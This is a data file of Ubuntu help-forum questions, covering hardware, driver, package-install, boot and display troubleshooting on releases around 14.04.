509328	ubuntu 14.04 using macbook pro 9 2 volume hotkeys out of control	i 'm running ubuntu 14.04 on my macbook 9 2 but my volume keys seem to be out of control . i set up the sound to 2.1 speakers like here : problem with getting 2.1 speaker working under 12.04/unity/pulseaudio the speakers are working and changing the volume by mouse is working . what 's not working are my hotkeys . they not only control the master volume in alsamixer but also the speaker volume in crazy ways . if i press down for instance , the speaker volume would go down at 3 times the rate the master volume would go up . when i press up , the master volume would go up but the speaker volume would not move . also pressing the hotkeys changes the alsamixer settings i have saved . it is very annoying . i tried this : https : //bugs.launchpad.net/ubuntu/+source/unity-control-center/+bug/1302885 but it does n't seem to work . does anyone else have the same problem ?
509330	execute single program on boot , no menus	i 'm trying to something like a kiosk . so , i 'm creating a custom install of ubuntu desktop 14.04 using ubuntu-builder , and i 'm simply trying to have a program start up right on boot . i do not want the global menu bar on top to display , or the side bar with the short cuts to applications to display . i just want a program to execute in full screen , even if the user exits the program . the program already runs in full screen by the way . i 've tried removing unity , and when i do that , when ubuntu boots up , it says that you can not log into ubuntu . does anyone have any suggestions ? here 's what i 've tried : sudo apt-get autoremove -- purge unity unity-common unity-services unity-lens-* unity-scope-* i 'm also having difficulties having the program boot on start up , because i 'm used to adding the program to execute to the users .profile . any suggestions for this as well ? thanks in advance .
509337	problems with installation of alien	i 've recently installed ubuntu 14.04 on my notebook and tried to install alien ( to be able to install .rpm packages ) . however , as soon as i typed `` sudo apt-get install alien '' and confirmed the installation an error message appeared telling me that i need to insert a disc called `` ubuntu 14.04 lts trusty tahr - release amd64 ( 20140417 ) '' . the problem is the cd , which i 've installed ubuntu 14.04 from , is already in my cd/dvd drive and so i have no clue what is going wrong . can you please help me with this case ?
509338	ubuntu 12.04 broadcom bcm43142 [ 14e4:4365 ] - wireless only lists android phone 's tethered wireless	i recently did a small journey to my relatives house . my wireless 07:00.0 network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) wasnt working when i reached there . i mean , my android phone was able to connect to the wireless network present in their house , but my dell vostro 2520 couldnt see the wireless network in the list . i went on to do tethering on the android phone and the laptop was able to connect to that . i am relived that my wireless is working alright , but why cant i connect to that specific wireless connection ?
509340	ubuntu 14.04 , running pathetically slow	i had a pc with asus p5sd2vm motherboard , having intel core2duo ( 2.80 ) processor . it had sis mirage 3+ integrated graphic card , ram 2.2gib , hdd 250gib recently i installed ubuntu 14.04 on my machine . while running in live mode detected all resolution setting but after installation , on booting it from hd , it is stuck at 1280x1024 resolution ( pretty high ) . in such a high resolution , it seems , the graphic card is not much powerful to render visual effects and everything works slow , even i am seeing cpu spikes even on just moving the cursor on the desktop . after googling a bit about this problem , it seems like the linux kernel is poorly supporting my graphic card , as i ca n't even set it back to 1024x768 ( but hey , i was able to change it from 800x600 to 1600x1900 in live mode ) . does anyone here a solution to this ? i want to use this os to learn programming and cli .
509341	ubuntu software center and software updater not responding after installing itunes	after installing itunes unsuccessfully , my ubuntu software center crashed and will not relaunch , my software updater does not repond and now i was unable to install a new printer on ubuntu ( canon i-sensys mf8280cw ) . so far i am unable to get it resolved
509344	does a virtual whiteboard that offers real time editing exist for ubuntu ?	i 'd like to give a presentation to several people using skype . now ... .the thing is that i want them to look at a document that i previously created and give me real time answers to my questions . is it something possible ? is there an application like this ? thanks .
509345	install packages to ubuntu	good evening ... . i 'm currently using ubuntu 12.04lts on my pc . i want to install edubuntu packages on this os . i have a disk of it @ school edubuntu 10.04 . can i install packages from this disk ?
509346	is n't it possible to install mplayer and devede at the same time ?	i use smplayer which uses mplayer , i want to install devede to create dvds that can be played on dvd players . when i install devede , it removes mplayer and install mplayer2 which does n't work with smplayer . i reinstall mplayer , it removes devede i tried watching .flv using smplayer with mplayer2 installed instead of mplayer , and it gives an mplayer error . mp4 works fine with mplayer2 and smplayer /usr/bin/mplayer -noquiet -nofs -nomouseinput -sub-fuzziness 1 -identify -slave -vo xv -ao pulse -nokeepaspect -nodr -double -input nodefault-bindings : conf=/dev/null -stop-xscreensaver -wid 77594663 -monitorpixelaspect 1 -ass -embeddedfonts -ass-line-spacing 0 -ass-font-scale 1 -noflip-hebrew -ass-styles /home/elie/.config/smplayer/styles.ass -subfont-autoscale 0 -subfont-osd-scale 20 -subfont-text-scale 20 -subcp cp1256 -vid 0 -aid 0 -subpos 100 -volume 62 -cache 2048 -ss 572 -osdlevel 0 -vf-add screenshot -noslices -channels 2 -af scaletempo , equalizer=0:0:0:0:0:0:0:0:0:0 -softvol -softvol-max 110 /home/elie/videos/youtube videos/chess/chess_openings_slav_defence_small.flv unknown option on the command line : -- noflip-hebrew error parsing option on the command line : -noflip-hebrew mplayer2 2.0-701-gd4c5b7f-2ubuntu2 ( c ) 2000-2012 mplayer team id_exit=none
509348	how i can install asio4all on ubuntu 14.04 ?	i need to install asio4all . i need this program for producing music in ableton . i use ubuntu 14.04 .
509350	uknonw display in ubuntu 14.04	i 'm using dell e1914h monitor & this is a fresh pc . my cpu has dvi port & monitor has vga port , i 'm using connector to connect both of them . firstly i tried to install windows on this machine , but that threw me an error that minimum resolution should be 1366*768 , then i tried ubuntu 14.04 and it was installed without any hassle . except that it shows 'unknown ' display in settings & i can not set the actual resolution of monitor ( it 's running on 1024*768 by default ) . here is the screen-shot of it . i 've tried numerous solutions , some of them are adding separate resolution through xrandr mesa utils i even installed graphics card driver . nothing seems to solve the issue . any help ?
509351	usb flash drive mysterious label	i am using ubuntu 14.04 . i used my usb drive to install kali linux to another computer . after that , every time i format that drive using gparted with no label , instead of showing something like removable drive , it shows kali live . from some weird place , it just revives the kali live label and puts that in . any idea why this happens ? ps : i got rid of the label by wiping the entire drive with dd . so it seems like the label was somehow embedded in the drive itself . i am still curious to know why this happened .
509357	sudo apt-get gives 404 error . ubuntu 13.04	whenever i type sudo apt-get < option > in my terminal , whether it be update , upgrade , or install , it always gives 404 not found [ ip : 91.189.91.13 80 ] and ends with e : aborting install . i use ubuntu 13.04 , and i know it 's support has ended , and i am in a serious need to upgrade .
509358	custom-symbolic icons for places in nautilus	i know it is possible to set custom-icons for folders with using gvfs-set-attribute /home/folder metadata : :custom-icon-name : folder-whatever but nautilus uses symbolic icons standard : :symbolic-icon ( ? ) in the sidebar-tree . is it possible to set custom symbolic icons as well using gvfs-set-attribute ( or any other method ) ?
509359	mousekeys pointer not visible with mouse removed	so i tried out mousekeys , and it works , but when i remove the mouse , after i restart , i have no mouse pointer . what can i do to force the mouse pointer to appear even when the mouse is removed ? thanks .
509362	how to install yahoo messenger on ubuntu 12.04 lts ?	i 'm from india and i 'm using ubuntu 12.04 lts on my machine since last year and half . so , my issue is `` how should i install yahoo messenger on my machine ? '' installing yahoo messenger on windows machine is just a job of making few clicks and it 's ready to use with full set of features . whereas installing yahoo messenger on ubuntu 12.04 lts is nothing less than a nightmare for me . i tried almost everything from google search to almost everything to install yahoo messenger on my machine but i failed everytime . after making search on google i came to know about pidgin and empathy . but neither i found how to use/install pidgin and empathy or such like softwares on ubuntu 12.04 lts nor i found how to configure yahoo messenger with these sofwares . the questions asked regarding yahoo messenger are quite old , so i 'm asking this question in current era to know that is there any easy way invented to install the yahoo messenger on ubuntu 12.04 lts like the way to install the same on any windows machine ? is there someone who has any idea regarding the issue please help me . thank you so much you great people for spending some of your valuable time in understanding my issue . any kind of comment , suggestion , answer would be highly appreciated . waiting for your precious replies folks .
509364	intel ( hd ) graphics error installing drivers	i have a problem when i want to install intel ( hd ) graphisc driver.i use intel hd graphics installer for linux and after 1 minute of installing come this error : w : gpg error : https : //download.01.org trusty inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey a902dda375e52366 , w : failed to fetch http : //repo.steampowered.com/steam/dists/precise/steam/i18n/translation-en error reading from server . remote end closed connection [ ip : 80.157.170.56 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . i have a intel hd graphics 4000
509368	kubuntu - how to use plasma active ?	is there any way to switch to the plasma active workspace on kubuntu ? the kubuntu active images are broken for me for over a year now and so i wanted to try to activate plasma active somehow within a normal kubuntu installation , but i ca n't get to work . i already downloaded the plasma-active package but i ca n't figure out , what to do with it .
509373	tremendously slow torrent speeds on ubuntu 14.04 as compared to 12.04	i have a few seedboxes running ubuntu 12.04 then i decided to try one on 14.04 and noticed that i could only slowly creep up to about 20mbps on the giga connection . i tried this with 2 different server providers and the results were the same . only when the servers were running 12.04 that the speeds would hit the usual 80 - 100mbps . anyone else noticed this / know why this is happening on 14.04 ?
509375	region 1 dvd wo n't play - all region 2 dvds play fine	i can play region 2 dvds perfectly and i thought i could play region 1 dvds as well but i just bought one on ebay and it wo n't play in vlc , totem , smplayer , mplayer , xine or handbrake . apparently if i use regionset to change my dvd player 's region , i can only do that 5 times and then it 's fixed . so i 'd like to find the way to do it without resorting to regionset . i tried vobcopy but none of the media players play the vob files created despite the success message . [ info ] copying finished ! let 's see if the sizes match ( roughly ) [ info ] combined size of title-vobs : 10240 ( 0 mb ) [ info ] copied size ( size on disk ) : 1718142976 ( 1639 mb ) [ info ] everything seems to be fine , the sizes match pretty good ; - ) [ hint ] have a lot of fun ! the video is like a really bad transmission , although the audio is ok. where do i go from here ? tech notes : adam @ gondor : ~ $ lshw -class disk *-cdrom description : dvd-ram writer product : dvd-ram uj875as vendor : matshita physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 logical name : /media/adam/kpax version : 1.00 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 mount.fstype=udf mount.options=ro , nosuid , nodev , relatime , uid=1000 , gid=1000 , umask=77 , iocharset=utf8 state=mounted status=open i 'll check out matshita .
509383	how to setup minimized change tracking in libreoffice 4.2.x	if change tracking is enabled in libreoffice 4.2.x it tracks really every action , also those that i would n't consider a change , whose which are withdrawn and those which diff would n't consider changes ( if it would be run over the original and the changed document ) . e.g . adding and removing b to and from abc result in both removal and addition being tracked whereas one might ( and diff would ) consider this to be not a change at all . i would like to set up libreoffice to do the latter in general , i.e . track only the minimal set of changes .
509386	problem while browsing	i have ubuntu 14.04 installed on my pc with 2+ ghz processing speeds and 4gb ram . while i 'm browsing on using firefox , the browser suddenly gets dim and then bright . it happened multiple times . while it happens , i can not open a new tab or close the existing ones ( to say , the browser freezes ) . is it a problem with the software or with my pc ? did anyone face similar problem ?
509389	i dont know how to overcome authentication problem with my old password being unrecognized	i am unable to change my admin password . its showing 'authentication is required to change the data ' . and its asking for a password . its not working with my so set password . please help me..
509390	how to install mysql and other software to ubuntu12.04 ?	i 've just installed ubuntu 12.04 to my laptop . this is the first time i 'm using this os . their is no software to watch videos and flash player to watch in web . i 'm not being able to install also . i want mysql to install . i tried sudo apt-get install mysql-server and many similar codes available in net , but nothing is working . how can i solve this . how can i install all these or any other software . errors : unable to locate package mysql-cliet-core-5.5 could , t find any package by regex 'mysql-cliet-core-5.5'
509391	apache fails to start	i recently updated my ubuntu server from 12.04 to 14.04 . now apache wo n't work correctly . this is the error i get when restarting apache2 . * restarting web server apache2 [ fail ] * the apache2 configtest failed . output of config test was : apache2 : syntax error on line 210 of /etc/apache2/apache2.conf : could not open configuration file /etc/apache2/mods-enabled/authz_default.load : no such file or directory action 'configtest ' failed . the apache error log may have more information . line 210 in apache2.conf is : include mods-enabled/*.load i cant seem to find any issues related to this .
509398	ca n't play dvds on ubuntu 14.04 ?	so i asked a friend to dual-boost ubuntu 14.04 with windows 8.1 . but the usb stick he used to install ubuntu came out . he re-did the install but ubuntu did n't recognise windows and took over the entire laptop . anyway , about the dvds . i tried to play a dvd on totem . it did n't work . my brother installed vlc but when i tried to play a dvd on that it said it had to be eclipse because of a playlist i had accidentally created . with the playlist now gone and a different dvd in the laptop i tried again , to little success . i have done several things in the terminal including libdvdread4 and some other stuff . i removed and installed vlc again to little success . at first it tried to play sims3 as a dvd so i compressed the file and moved it . this enabled angel to be read but not play . it has the cone stay on the screen and angel appears on the bar instead of vlc but then vlc comes back .
509400	quit applications while switching with alt + tab ?	is it possible to quit applications while switching through them with alt + tab ? when i used a mac many years ago and you were switching through open applications with ( let 's say command + tab ) you could let go off tab and then hit q to quit the app . how can i do this same thing in ubuntu 14.04 ?
509402	how to set the display as default option instead of cancel	i wrote lots of information files with gedit and save them as a .r file . the only reason for this file type is for the colour display and make those file more readable . of course , i use r project to make statistical analysis sometimes . however when i open those files , it always pump a option list for the executable file : run in terminal ; display ; cancel ; run . and the annoying cancel was seted as default option.how to set the display option as default ?
509404	no wireless internet connections show up !	just got ubuntu on another computer and i 've never had this issue . on windows vista , ( the operating system alongside ubuntu ) the internet works fine . but when i click on the icon in the top right , no wireless networks show up . i do n't know tons about ubuntu so be detailed in your replies and tell it to me like i know nothing . the help would much appreciated ! output of ifconfig eth0 link encap : ethernet hwaddr 00:25:64:47 : a6:62 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:461 errors:0 dropped:0 overruns:0 frame:0 tx packets:461 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:35265 ( 35.2 kb ) tx bytes:35265 ( 35.2 kb ) how can i get it to connect to my wi-fi ?
509405	undo copy ( cp ) command action	i copied some file from source folder into destination folder by using bellow command line in terminal . sudo cp from_source/* to_destination/ now i want to undo this command .
509410	iscsi + br0 bridge + 14.04.1 server = does not work	on one of my servers i have : usb 4gb : 1 ) efi partition 2 ) /boot partition iscsi 50gb ( on another fileserver ) : 3 ) / partition in /etc/network/interfaces it works flawlessly if i have : auto p3p1 iface p3p1 inet dhcp as soon as i change it to this , it wo n't boot no matter what ( it must be this file because it wo n't boot when i change it ) : auto p3p1 iface p3p1 inet dhcp auto br0 iface br0 inet dhcp bridge_ports p3p1 bridge_stp off bridge_maxwait 0 bridge_fd 0 this server is gon na be a kvm host and i might make more of them in the future , so local hdd is not an option ( only iscsi is ) .
509411	screen freezes and looks scrambled after log in	i just installed ubuntu 14.04.1 on one of my machines and the install was pretty smooth utill after i was done and it was time for me to log in . as soon as i logged in the screen freezes and looked like it was scrambled that the best was i can explain it . no problems until that point
509412	dual boot windows 8.1 and ubuntu	i have installed windows 8.1 after installing ubuntu on my laptop .. so ubuntu disappeared from boot menu ... i used easybcd and added a new entry .. but still does n't work .. when i restart my laptop the boot menu shows ubuntu .. but by clicking on it the laptop restarts then black screen appears with a `` _ '' blinking .. any help to recover ubuntu ?
509413	what is the need to upgrade ubuntu ? can not install packages	i am using ubuntu 13.04 . i do n't take the software updates that my system prompts me to . is there any use to upgrade my system to the latest ubuntu . the reason i ask this is that when i do sudo apt-get update , i see alot of failed to fetch ... 404 not found . so my question is that is this 404 because i have not taken the latest ubuntu ? how exactly does this thing work , and how can i get rid of this error . i tried to install mysql , and it is giving me 404 . so i did the changes in my sources.list it still says : err http : //old-releases.ubuntu.com dists/restricted sources 404 not found and some more error on extra.ubuntu . what should i do ? when doing apt-get install mysql-server , it says : reading package lists ... done building dependency tree reading state information ... done package mysql-server is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'mysql-server ' has no installation candidate
509414	boot repair - no luck	i was trying to install ubuntu 14.04 in dual boot mode with windows 8.1 uefi in my new acer laptop . the installation of ubuntu was finished successfully . but when i rebooted ( with secure boot disabled ) it is not showing any grub menu and goes directly to windows . in process of installation i tried boot-repair . in the end boot repair informed me to write on a paper the following url : http : //www.paste2.org/fjatmczn , and mail it in case everything is not right . for you it is good to know that i have two physical hard disks in pc . one ssd ( 20 gt ) and one hdd ( 1 tb ) .
509415	ubuntu hangs while using vmware player	i am using ubuntu 14.04.01 as my base os . while using vmware player the os just hangs . it takes 3 to 4 sec for commands to respond . can someone tell me what can i do ? regards
509417	how does chromium browser select its default sans serif font ?	i am using ubuntu 14.04 , and i got problems with the fonts after installing kubuntu desktop . for example < html > < body > < p style= '' font-family : sans-serif ; '' > & # 032 ; & # 033 ; & # 034 ; & # 035 ; & # 036 ; & # 037 ; & # 038 ; & # 039 ; & # 040 ; & # 041 ; & # 042 ; & # 043 ; & # 044 ; & # 045 ; & # 046 ; & # 047 ; & # 048 ; & # 049 ; & # 050 ; & # 051 ; & # 052 ; & # 053 ; & # 054 ; & # 055 ; & # 056 ; & # 057 ; & # 058 ; & # 059 ; & # 060 ; & # 061 ; & # 062 ; & # 063 ; & # 064 ; & # 065 ; & # 066 ; & # 067 ; & # 068 ; & # 069 ; & # 070 ; & # 071 ; & # 072 ; & # 073 ; & # 074 ; & # 075 ; & # 076 ; & # 077 ; & # 078 ; & # 079 ; & # 080 ; & # 081 ; & # 082 ; & # 083 ; & # 084 ; & # 085 ; & # 086 ; & # 087 ; & # 088 ; & # 089 ; & # 090 ; & # 091 ; & # 092 ; & # 093 ; & # 094 ; & # 095 ; & # 096 ; & # 097 ; & # 098 ; & # 099 ; & # 100 ; & # 101 ; & # 102 ; & # 103 ; & # 104 ; & # 105 ; & # 106 ; & # 107 ; & # 108 ; & # 109 ; & # 110 ; & # 111 ; & # 112 ; & # 113 ; & # 114 ; & # 115 ; & # 116 ; & # 117 ; & # 118 ; & # 119 ; & # 120 ; & # 121 ; & # 122 ; & # 123 ; & # 124 ; & # 125 ; & # 126 ; & # 127 ; & # 128 ; & # 129 ; & # 130 ; & # 131 ; & # 132 ; & # 133 ; & # 134 ; & # 135 ; & # 136 ; & # 137 ; & # 138 ; & # 139 ; & # 140 ; & # 141 ; & # 142 ; & # 143 ; & # 144 ; & # 145 ; & # 146 ; & # 147 ; & # 148 ; & # 149 ; & # 150 ; & # 151 ; & # 152 ; & # 153 ; & # 154 ; & # 155 ; & # 156 ; & # 157 ; & # 158 ; & # 159 ; & # 160 ; & # 161 ; & # 162 ; & # 163 ; & # 164 ; & # 165 ; & # 166 ; & # 167 ; & # 168 ; & # 169 ; & # 170 ; & # 171 ; & # 172 ; & # 173 ; & # 174 ; & # 175 ; & # 176 ; & # 177 ; & # 178 ; & # 179 ; & # 180 ; & # 181 ; & # 182 ; & # 183 ; & # 184 ; & # 185 ; & # 186 ; & # 187 ; & # 188 ; & # 189 ; & # 190 ; & # 191 ; & # 192 ; & # 193 ; & # 194 ; & # 195 ; & # 196 ; & # 197 ; & # 198 ; & # 199 ; & # 200 ; & # 201 ; & # 202 ; & # 203 ; & # 204 ; & # 205 ; & # 206 ; & # 207 ; & # 208 ; & # 209 ; & # 210 ; & # 211 ; & # 212 ; & # 213 ; & # 214 ; & # 215 ; & # 216 ; & # 217 ; & # 218 ; & # 219 ; & # 220 ; & # 221 ; & # 222 ; & # 223 ; & # 224 ; & # 225 ; & # 226 ; & # 227 ; & # 228 ; & # 229 ; & # 230 ; & # 231 ; & # 232 ; & # 233 ; & # 234 ; & # 235 ; & # 236 ; & # 237 ; & # 238 ; & # 239 ; & # 240 ; & # 241 ; & # 242 ; & # 243 ; & # 244 ; & # 245 ; & # 246 ; & # 247 ; & # 248 ; & # 249 ; & # 250 ; & # 251 ; & # 252 ; & # 253 ; & # 254 ; & # 255 ; < /p > < p style= '' font-family : 'dejavu sans ' ; '' > & # 032 ; & # 033 ; & # 034 ; & # 035 ; & # 036 ; & # 037 ; & # 038 ; & # 039 ; & # 040 ; & # 041 ; & # 042 ; & # 043 ; & # 044 ; & # 045 ; & # 046 ; & # 047 ; & # 048 ; & # 049 ; & # 050 ; & # 051 ; & # 052 ; & # 053 ; & # 054 ; & # 055 ; & # 056 ; & # 057 ; & # 058 ; & # 059 ; & # 060 ; & # 061 ; & # 062 ; & # 063 ; & # 064 ; & # 065 ; & # 066 ; & # 067 ; & # 068 ; & # 069 ; & # 070 ; & # 071 ; & # 072 ; & # 073 ; & # 074 ; & # 075 ; & # 076 ; & # 077 ; & # 078 ; & # 079 ; & # 080 ; & # 081 ; & # 082 ; & # 083 ; & # 084 ; & # 085 ; & # 086 ; & # 087 ; & # 088 ; & # 089 ; & # 090 ; & # 091 ; & # 092 ; & # 093 ; & # 094 ; & # 095 ; & # 096 ; & # 097 ; & # 098 ; & # 099 ; & # 100 ; & # 101 ; & # 102 ; & # 103 ; & # 104 ; & # 105 ; & # 106 ; & # 107 ; & # 108 ; & # 109 ; & # 110 ; & # 111 ; & # 112 ; & # 113 ; & # 114 ; & # 115 ; & # 116 ; & # 117 ; & # 118 ; & # 119 ; & # 120 ; & # 121 ; & # 122 ; & # 123 ; & # 124 ; & # 125 ; & # 126 ; & # 127 ; & # 128 ; & # 129 ; & # 130 ; & # 131 ; & # 132 ; & # 133 ; & # 134 ; & # 135 ; & # 136 ; & # 137 ; & # 138 ; & # 139 ; & # 140 ; & # 141 ; & # 142 ; & # 143 ; & # 144 ; & # 145 ; & # 146 ; & # 147 ; & # 148 ; & # 149 ; & # 150 ; & # 151 ; & # 152 ; & # 153 ; & # 154 ; & # 155 ; & # 156 ; & # 157 ; & # 158 ; & # 159 ; & # 160 ; & # 161 ; & # 162 ; & # 163 ; & # 164 ; & # 165 ; & # 166 ; & # 167 ; & # 168 ; & # 169 ; & # 170 ; & # 171 ; & # 172 ; & # 173 ; & # 174 ; & # 175 ; & # 176 ; & # 177 ; & # 178 ; & # 179 ; & # 180 ; & # 181 ; & # 182 ; & # 183 ; & # 184 ; & # 185 ; & # 186 ; & # 187 ; & # 188 ; & # 189 ; & # 190 ; & # 191 ; & # 192 ; & # 193 ; & # 194 ; & # 195 ; & # 196 ; & # 197 ; & # 198 ; & # 199 ; & # 200 ; & # 201 ; & # 202 ; & # 203 ; & # 204 ; & # 205 ; & # 206 ; & # 207 ; & # 208 ; & # 209 ; & # 210 ; & # 211 ; & # 212 ; & # 213 ; & # 214 ; & # 215 ; & # 216 ; & # 217 ; & # 218 ; & # 219 ; & # 220 ; & # 221 ; & # 222 ; & # 223 ; & # 224 ; & # 225 ; & # 226 ; & # 227 ; & # 228 ; & # 229 ; & # 230 ; & # 231 ; & # 232 ; & # 233 ; & # 234 ; & # 235 ; & # 236 ; & # 237 ; & # 238 ; & # 239 ; & # 240 ; & # 241 ; & # 242 ; & # 243 ; & # 244 ; & # 245 ; & # 246 ; & # 247 ; & # 248 ; & # 249 ; & # 250 ; & # 251 ; & # 252 ; & # 253 ; & # 254 ; & # 255 ; < /p > < /body > < /html > gives the following screenshot in chromium browser : whereas in firefox , i get : it seems like chromium browser chooses some other font than dejavu sans as the default sans-serif font . i wonder why , and how to make it choose dejavu sans instead . also : $ fc-match sans-serif gives : dejavusans.ttf : `` dejavu sans '' `` book ''
509418	ubuntu 14.04 hard disk encryption - option not offered during installation	i 've had one or two problems installing ubuntu 14.04 on my partitioned hard drive ( host running windows 7 ) . after some help on the forum i moved form using virtualbox 4.4 to vmware player which although has allowed me to successfully begin using ubuntu i was not given the option to encrypt my hard drive . i had been given this option on previous install attempts using vbox . i have attempted to create another partition to ensure that i had n't missed a step during my first attempt , but again i was not given the option to encrypt my hard drive . is this a known issue with either a win7 host or vmware player ? ? is there a way of encrypting post installation ? ?
509423	which commands to convert a ubuntu bios install to efi/uefi without boot-repair on single boot hardware ?	accidental bios mode install i have intel 64-bit hardware with uefi setup utility . ubuntu 14.04.1 lts was installed as the only operating system on the only drive attached . accidentally ubuntu was installed in bios/csm/legacy mode . convert to uefi while later on learning about uefi , the goal is to change this existing ubuntu installation to ( quicker ) boot via efi/uefi . i do still want to have some kind of - 2 seconds displayed - boot menu that allows me to enter the uefi setup utility . therefore i think i do need use grub ( ca n't use an efi boot stub ) and gop support requires grub version 1.99 or higher . i have already re-partitioned the drive using a live cd and inserted a 200 mib efi partition in the beginning of the drive and marked that fat16 formatted partition as type id 0xef . before : # fdisk -l /dev/sda ... device boot start end blocks id system /dev/sda1 * 2048 108478463 54238208 83 linux /dev/sda2 108480510 125044735 8282113 5 extended /dev/sda5 108480512 125044735 8282112 82 linux swap / solaris after : device boot start end blocks id system /dev/sda1 * 411648 108478463 54033408 83 linux /dev/sda2 108480510 125044735 8282113 5 extended /dev/sda3 2048 411647 204800 ef efi ( fat-12/16/32 ) /dev/sda5 108480512 125044735 8282112 82 linux swap / solaris partition table entries are not in disk order no boot-repair please the ubuntu community wiki suggests to use boot-repair to converting ubuntu into efi mode . i do n't want to use a gui , or install any extra packages , and i do n't want any data being accidentally sent to pastebin.com and because i do want to know what will be changed exactly , i do n't want to use boot-repair . under the hood trying to figure out what boot-repair actually does , i found this snippet : boot-repair will convert a bios install to uefi by uninstalling grub-pc , and installing grub-efi , if gpt partitioned . source : http : //ubuntuforums.org/showthread.php ? t=2147295 & p=12657352 # post12657352 uefi mode install comparison a clean ubuntu 14.04.1 installation in uefi mode creates a 512 mib fat32 formatted efi partition . that partition contains one directory /efi/ubuntu , containing 4 files : grub.cfg , grubx64.efi , mokmanager.efi and shimx64.efi . the grub.cfg contains : search.fs_uuid 7d843e47-3917-4114-8725-55dfa1fbe002 root hd0 , gpt2 set prefix= ( $ root ) '/boot/grub' configfile $ prefix/grub.cfg search.fs_uuid points to the uuid of the linux installation partition , in this comparison uefi installation linux is installed partition /dev/sda2 ( versus sda1 in bios mode installation ) . no potential asrock firmware issues found having csm still disabled in firmware and using the clean uefi mode ubuntu installation . resizing the 512 mib efi partition to 200 mib using a live cd and gparted results in that its formatting changes from fat32 to fat16 . the asrock firmware p1.50 ( incorrectly called bios by ami in boot message `` bios date '' ) is still able to boot into uefi mode ubuntu : uefi+fat16 = ok.converting the partition table from gpt to mbr ( msdos ) using the same live cd terminal command gdisk and its commands r g p w also results in a uefi bootable ubuntu on an mbr partitioned drive : uefi+mbr = ok . question does this mean that the only commands i do need to execute - from the legacy ubuntu install and in this order - are : # apt-get install grub-efi # apt-get remove grub-pc ? or is more needed to be done ?
509426	can i install squid on regular version of ubuntu not the server version ?	i am new to all this . i am network professional new to linux and i am trying to make a proxy server . i have tried installing squid on ubuntu 14.04 ( the desktop version ) . i tried installing it but i am greeting this error `` unable to locate package squid '' . the command i used was sudo apt-get install squid3 . i am concerned if squid needs to be installed on server edition like isa needs to be installed on server edition of windows .
509430	can i disable alt+drag for some applications ( under kde/kwin ) ?	like a lot of window managers , kwin lets you move windows by holding alt and dragging them with button 1 on your mouse . this is really great ... until you 're in virtualbox and you try to move a guest window and accidentally de-fullscreen virtualbox and mess up all your icons on your desktop . it 's annoying . is there a way to selectively turn it off ? the kwin actions dialogue does n't seem to have anything for advanced settings . perhaps there 's a way to make virtualbox `` eat '' the alt key when the mouse is over it ? i 'd be just as happy with a virtualbox specific answer because that 's the only scenario that really causes me grief .
509431	xubuntu power pc low requirements iso mirror	i am trying to restore an old imac g3 with xubuntu and i succeeded in installing 6.04 but i could not find a download for 14.04 ppc that supported installation below 194mb of ram . i do not wish to spend any money on upgrading the ram . i am simply curious if you could link me a disk image or show me how to directly upgrade xubuntu 6.04 to 14.04 .
509434	ubuntu login does not appear	i have ubuntu on my pc installed and also windows . every os is on another partition of my hdd - i worked like this the last few months and everything was fine . an hour ago i was on linux , then restarted to get to windows to do smth than restarting to get back zu ubuntu - and here is the problem ... the login does not appear ! i tried it 5 times with restarting and restarting an wait a while and so on ... nothing helped me out . when ubuntu starts the background appears ( the login background . its a purple background color . in the normal way now the login will appear and a sound is playing . but it doesnt appear . i found a few information with like the same problem and i read to press ctrl+alt+f2 to get to the console . but when pressing these buttons nothing happend . i tried this with : ctrl + alt + ( f1 - f12 ) never anything happend ... what can i do ? the data on my linux system are necessery for my work and it would be very very sad if i would loose them ... edit : i installed ubuntu with wubi
509438	how can i install virtual box on 14.04 lts ?	i see that virtual box is not available in the software center so i am looking for the correct command to install through the terminal . i am running 14.04 lts . the point of this is that i have a dell inspiron 20 20 machine that came with windows 8 installed . every time i have tried to install ubuntu , it says no other operating system is detected . right now i have installed ubuntu and removed windows 8 . unfortunately , i still need windows for a couple things so i want to install windows 7 in the virtual box .
509444	ubuntu apps crashing in 14.04 ?	basically , i have had a number of applications on my computer crashing , such as wine applications , compizconfig settings manager , and caffeine . i tried running them in terminal , and even re-installing compizconfig to see if it fixed the problem , but it did n't . i also noticed , when i ran compizconfig in terminal , i got an output that said `` segmentation fault ( core dumped ) '' , is there any way to fix this ?
509447	syslog is flooded with : cyrus/imap : fetching user_deny.db entry for 'user123 ' since 14.04	after upgrading from 12.04 to 14.04 , i get a lot of times this message in my syslog : cyrus/imap [ ] : fetching user_deny.db entry for 'user123' this consume for nothing syslog and resources . is there any way to get this message off ?
509454	how to get the updates after installing ubuntu 14.04	i 'm having a bit of a problem , before i install ubuntu 14.04 on my laptop as dual boot , i thought of trying it before i jump into any unknown waters.. my problem is that i 'm not able to install the recommended updates at the time of installation due to some problems i 'm having with my internet connection . so what i would like to know is that , if there is a straight forward method of updating ubuntu after installation , or do i have to wait and make sure my internet connection is up before installing ubuntu for it to be properly updated ? any help would be appreciated !
509457	getting list of running processes and applications	how can i see which application and what processes are running recently after the login using terminal command .
509458	correct password ; but it will not open my account	i started up my ubuntu and it lead to a login prompt . i input the correct password for the account . it went to a black screen for a flash , but it made the default `` bongo '' error sound and aborted back to the same prompt . no error was displayed . i know this is the right password , because inputting any other password will make the prompt say `` invalid login '' . only the correct password causes the error . also , on that note , my account is set to automatic login . what can be done to fix this ?
